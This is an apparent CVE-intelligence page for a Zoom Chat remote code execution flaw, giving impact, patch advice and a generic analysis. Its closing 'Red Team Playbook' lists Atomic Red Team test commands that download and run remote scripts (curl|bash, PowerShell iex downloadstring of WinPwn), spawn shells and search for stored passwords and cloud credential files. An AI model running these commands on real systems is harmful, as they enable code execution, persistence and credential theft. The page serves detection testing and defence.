CVE-2021-30480
Overview
This vulnerability is a remote code execution flaw rooted in improper handling of authenticated message processing within the Zoom Chat client on Windows and macOS. The flaw arises from insufficient validation of input data in the Zoom Chat software component, allowing specially crafted messages from authenticated contacts to trigger execution of arbitrary code. The vulnerability specifically affects the Zoom Chat application, distinct from Zoom Meetings or Webinar components.
Vulnerability Description
Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a contact. NOTE: this is specific to the Zoom Chat software, which is different from the chat feature of the Zoom Meetings and Zoom Video Webinars software.
Impact
An attacker with authenticated access as a contact within the same organization or an accepted external contact can execute arbitrary code on the victim’s system without any user interaction, enabling potential full system compromise or lateral movement within the network. The attack requires low privileges (PR:L) but no user interaction (UI:N), with high complexity (AC:H) and network-based attack vector (AV:N). This could lead to unauthorized control over the affected endpoint and access to sensitive organizational data.
Solution
Zoom released an update addressing this vulnerability in Zoom Chat client versions released after 2021-04-09. Users should upgrade to the latest Zoom Chat client version available from the official Zoom download center. Detailed patch instructions and advisories are available from Zoom’s official support channels and the Malwarebytes blog referenced, which document the fixed versions and recommended upgrade procedures to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Zoom Chat allows remote authenticated attackers to execute arbitrary code on affected systems without requiring user interaction. This flaw arises from improper handling of certain inputs, which can lead to memory corruption or execution of malicious payloads. Specifically, the vulnerability is tied to the way Zoom Chat processes messages or files sent within the application. When an attacker, who must either be within the same organization or an accepted external contact, sends a specially crafted message, the application may inadvertently execute code that the attacker has embedded within the message. This exploitation can occur on both Windows and macOS platforms, making it a significant concern for users across different operating systems.
Attack vectors for this vulnerability are particularly insidious due to the requirement for the attacker to be an authenticated user. This means that an attacker could leverage social engineering techniques to gain access to a user's contact list or convince a user to accept them as a contact. Once this relationship is established, the attacker can send malicious messages that exploit the vulnerability. Scenarios could include an attacker impersonating a trusted colleague or partner, thereby increasing the likelihood that the victim would open the malicious message without suspicion. The potential for exploitation is compounded by the widespread use of Zoom Chat in professional environments, where users may be more inclined to trust communications from known contacts.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely heavily on Zoom Chat for internal communications. Successful exploitation could lead to unauthorized access to sensitive information, disruption of business operations, or even the deployment of ransomware within an organization’s network. The business risk associated with such a vulnerability includes not only the immediate financial costs related to remediation and recovery but also long-term reputational damage. Organizations may face regulatory scrutiny, loss of customer trust, and potential legal ramifications if sensitive data is compromised. The high CVSS score of 8.8 underscores the critical nature of this vulnerability and the urgency with which organizations should address it.
Detection and mitigation strategies for this vulnerability should focus on both technical and procedural measures. Organizations should implement robust monitoring solutions that can detect anomalous behavior within Zoom Chat, such as unusual message patterns or unexpected file transfers. Regular security assessments and penetration testing can also help identify potential weaknesses in the application. From a procedural standpoint, educating users about the risks associated with accepting contacts and opening messages from unknown or untrusted sources is crucial. Additionally, organizations should consider applying patches and updates provided by Zoom as soon as they are released, as these updates often contain critical fixes for known vulnerabilities.
In conclusion, the vulnerability in Zoom Chat represents a significant threat to organizations that utilize this platform for communication. The combination of remote code execution capabilities and the requirement for authenticated access creates a unique risk profile that necessitates immediate attention. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats. Implementing comprehensive detection and mitigation strategies will be essential in safeguarding sensitive information and maintaining the integrity of business operations in an increasingly digital communication landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zoom | Chat | All |
cpe:2.3:a:zoom:chat:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.